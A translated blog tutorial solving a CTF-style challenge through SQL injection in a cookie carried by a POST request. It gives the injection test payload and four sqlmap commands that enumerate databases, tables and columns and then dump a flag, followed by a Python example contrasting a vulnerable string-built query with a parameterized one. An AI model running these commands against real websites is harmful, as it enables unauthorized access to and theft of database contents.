POST injection with sqlmap

Table of contents

  1. POST injection with sqlmap
  2. Cookie injection: dumping the database

POST injection

1. Verify that the injection exists

In the normal request the header is "Cookie: user="; after changing it to "Cookie: user=admin", the flag parameter appears in the POST response.

Verify with Cookie: user=admin' and '1'='1' : the request returns an error and the flag is not echoed, which shows that an injection exists here.

2. Copy the POST request and save it as the file 1.txt

>> The injection here goes through the modified cookie, so read this case with the principles of both cookie injection and POST injection in mind. In practice the two are combined here, although each is a separate technique.

 

Cookie injection

POST injection means injecting through the data of a POST request. Cookie injection means modifying the cookie information, either to disguise an identity or to use the cookie as the injection point.

1. Enumerate the databases

>sqlmap -r 1.txt --cookie="user=admin" -p user --level 2 --string="flag" --dbms=mysql --dbs

>> You can see there are four databases

The saved POST request: 1.txt here; write the location of the file, for example /root/1.txt

The cookie to send: --cookie="user=admin"

The --string parameter specifies a string that the page contains when the result is true; a page that does not contain it is judged as false. --string="flag" means the word flag is echoed when the result is correct.

Specify the database type: --dbms=mysql

Enumerate the databases: --dbs

2. Guess the tables

>sqlmap -r 1.txt --cookie="user=admin" -p user --level 2 --string="flag" --dbms=mysql -D employee --tables

>> There are three tables under the employee database

-D names the specific database whose tables are to be guessed

Guess the tables: --tables

The other parameters are unchanged

3. Guess the columns of table fllaagg

>sqlmap -r 1.txt --cookie="user=admin" -p user --level 2 --string="flag" --dbms=mysql -D employee -T fllaagg --columns

Guessing columns requires specifying the database and the table: -D database -T table

Guess the columns: --columns

4. Guess the field contents in the table

>sqlmap -r 1.txt --cookie="user=admin" -p user --level 2 --string="flag" --dbms=mysql -D employee -T fllaagg -C "flag" --dump

>> The field contains the flag

Guessing field contents requires specifying the database, the table and the column: -D database -T table -C "column"

Guess the field contents: --dump

The same method can be used to view the contents of the other databases and tables. The injection point is handled the same way; here the injection point is the cookie data modified in the request. If instead the POST data of the request is itself injectable, inject through POST directly and do not add a cookie parameter such as --cookie "user=admin".
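An added example, not from the original post: the cookie check from step 1 reproduced against a constructed SQLite table (the challenge uses MySQL; the `users` table, its columns and the function names are assumptions), showing the string-built query beside a parameterized one that treats the same cookie value as plain data.

```python
import sqlite3


def make_db():
    # Constructed stand-in for the challenge database (schema is an assumption).
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (name TEXT, flag TEXT)")
    db.execute("INSERT INTO users VALUES ('admin', 'flag{constructed-sample}')")
    return db


def lookup_vulnerable(db, cookie_user):
    # The cookie value is concatenated into the SQL text, so any quote
    # character in the cookie is parsed as SQL syntax, not as data.
    sql = "SELECT flag FROM users WHERE name = '" + cookie_user + "'"
    try:
        row = db.execute(sql).fetchone()
    except sqlite3.Error:
        return "error"  # the "error, no flag echoed" case from step 1
    return row[0] if row else "no flag"


def lookup_parameterized(db, cookie_user):
    # The cookie value is bound to a placeholder: the driver passes it as a
    # single string value and the SQL text never changes.
    row = db.execute(
        "SELECT flag FROM users WHERE name = ?", (cookie_user,)
    ).fetchone()
    return row[0] if row else "no flag"


def compare(cookie_user):
    # Returns (vulnerable result, parameterized result) for one cookie value.
    db = make_db()
    return lookup_vulnerable(db, cookie_user), lookup_parameterized(db, cookie_user)


if __name__ == "__main__":
    # The two cookie values used in step 1 of the post.
    for value in ("admin", "admin' and '1'='1'"):
        print(repr(value), compare(value))
```

With the parameterized query the quoted value is only an unknown user name, so the page content no longer depends on SQL carried in the cookie.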


Origin www.cnblogs.com/loopkep/p/11406765.html